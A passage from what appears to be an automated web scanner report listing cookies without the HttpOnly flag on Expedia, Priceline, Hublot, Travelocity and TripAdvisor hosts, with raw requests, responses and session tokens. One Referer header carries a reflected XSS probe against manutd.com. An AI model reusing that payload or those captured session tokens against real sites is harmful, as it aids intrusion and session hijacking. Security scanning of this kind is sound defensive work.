P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:13:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:02 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:17:52 GMT; Path=/
Content-Length: 426876

<!DOCTYPE html>
<!-- rendered by MVC -->
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="language" content=""/>

<m
...[SNIP]...
14.66. http://www.expedia.com/Details  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Details

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=f80a6253-97ca-4b75-98ff-8895038babf3 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/TripPreferences?tripid=e0ec7dc7-accc-4a30-b5fb-7781275b132a&c=d8e96adc-f4c8-4481-b77d-30afb9785c2c
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:14 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:14 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`user=v.8,0,EX01E9F091F9$22$87001000$FF$5C37$0E$C1$C6!2$0E$C1$C6!2$0E$C1$C6$0E1000$11000$1E81!90$D1$9C$B9$EE$B3$32p$A2!i02000`125; Domain=.expedia.com; Path=/
Set-Cookie: p1=`accttype=v.2,8,1,EX014BD1106A$B48SBjmv$E3$7B$1Es$A7$BD3$18$E3$7D$14$5CM$B56$8F$E0j$13$F9$CBG$E6$F7v$A6`minfo=v.5,EX01EEEB4066$B48SBymv$FCb$10s$A7$BE3$18$E3$7D$14RM$B76$8F$E6j$13$FA$CEG$E6$F0v$916$3E$1Bn$2B$7D$2A$87$92$E2$FE$19$35$17Wf$0Bi$15$EC$26b$A33$93z$1Fd$871$12$3CM$7E`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247906574|1033|0|0||0|0|0|-1|-1`382; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:11:05 GMT; Path=/

14.67. http://www.expedia.com/Hotel-Search  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Hotel-Search HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 9102
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

piid=6da35fba-7158-407e-a148-c2d242f8e3c3&hart=16706&pqar=441.86&pqtr=&oldr=bGxpdmBu&rfrr=-56908&hwrq=EX013A5C34E0DNGD110300%2429%24AF008Tq%249C%24ADH%24CB%2492%241B%24B7%2415%2495%242C%24D9O%24EC%24B
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/Details?action=UnifiedDetailsWidget@showDetails&rfrr=-56908&c=86f50a38-52dd-41f7-9a0a-0e0cc39da211
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:16 GMT
Connection: close
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:07:09 GMT; Path=/
Set-Cookie: JSESSION=31edaa66-8664-4539-91ca-3e8b6c692734; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:10:59 GMT; Path=/

14.68. http://www.expedia.com/Hotel-Search-WidgetInitJS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotel-Search-WidgetInitJS

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotel-Search-WidgetInitJS?action=widgetInitJS&v=release-2011-09-r3.10.274201 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=00,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:28 GMT
Content-Length: 101505
Connection: close
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:38:28 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:42:18 GMT; Path=/

jQuery(document).ready(function($){
var $hotelSearchForm = $("#hotelSearchForm");
var $form = $("#hotelFilterForm");

$hotelSearchForm.bind("submit", function(e){
$hotelSe
...[SNIP]...
14.69. http://www.expedia.com/Hotels/Offers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=4215&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 00:14:15 GMT
Connection: close
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:13 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:18:03 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":24,"BookingCount":59,"HotelId":4215,"isValidViewCount":true,"isValidBookingCount":true}]}
14.70. http://www.expedia.com/Hotels/Offers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=894999&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; iEAPID=21187; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 01:02:38 GMT
Connection: close
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:02:38 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX01B27DF898$F1$88002000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; Domain=.expedia.com; Path=/
Set-Cookie: p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:06:28 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":5,"BookingCount":3,"HotelId":894999,"isValidViewCount":true,"isValidBookingCount":true}]}
14.71. http://www.hublot.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hublot.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 301 Moved Permanently
Location: /en/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:58:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; path=/

14.72. http://www.jscache.com/weimg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jscache.com
Path:   /weimg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weimg?itype=langs/en/tripadvisor_logo_207x51-12811-0.gif&lang=en HTTP/1.1
Host: www.jscache.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 165
Content-Type: application/x-javascript;charset=UTF-8
Expires: Mon, 03 Oct 2011 00:38:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:38:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:43 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.BC649BA2FF72A3D5B3A8EB2418B261B6*SQ.2*LS.weimg*GR.43*TCPAR.79*TBR.64*EXEX.37*ABTR.55*PPRP.72*PHTB.89*FS.64*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.3*DF.0*FP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*FS.32*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/

document.write( '<img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif" style="border:none; margin:0;" alt=" TripAdvisor"/>' );
14.73. http://www.priceline.com/QP.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /QP.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=priceline&grp=9706&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.priceline.com%2FQP.asp%3FProductID%3D5R%26refid%3DPLIGOUGO%26refclickid%3DHOTELSEARCH%26City%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26Rooms%3D%24%7Brooms%7D%26CheckInDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26CheckOutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=154&pos=1&aii=d1125990-8f30-4f2a-83dc-0b115fb728a1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 7684
Content-Type: text/html
Set-Cookie: Referral=CLICKID=HOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A43&ID=IGOUGO; expires=Wed, 02-Nov-2011 00:09:42 GMT; domain=.priceline.com; path=/
Set-Cookie: PSessKey=721510AC6F1410AC2011100300094354c311228538; domain=.priceline.com; path=/
Set-Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; expires=Thu, 30-Sep-2021 00:09:42 GMT; domain=.priceline.com; path=/
Cache-control: private


<html>
<head>
<meta HTTP-EQUIV="Cache-Control" CONTENT="no cache">
<meta HTTP-EQUIV="Pragma" CONTENT="no cache">
<meta HTTP-EQUIV="Expires" CONTENT="0">
<meta HTTP-EQUIV="content-type"
...[SNIP]...
14.74. http://www.priceline.com/hotels/lang/en-us/itinerary.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20
...[SNIP]...
14.75. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
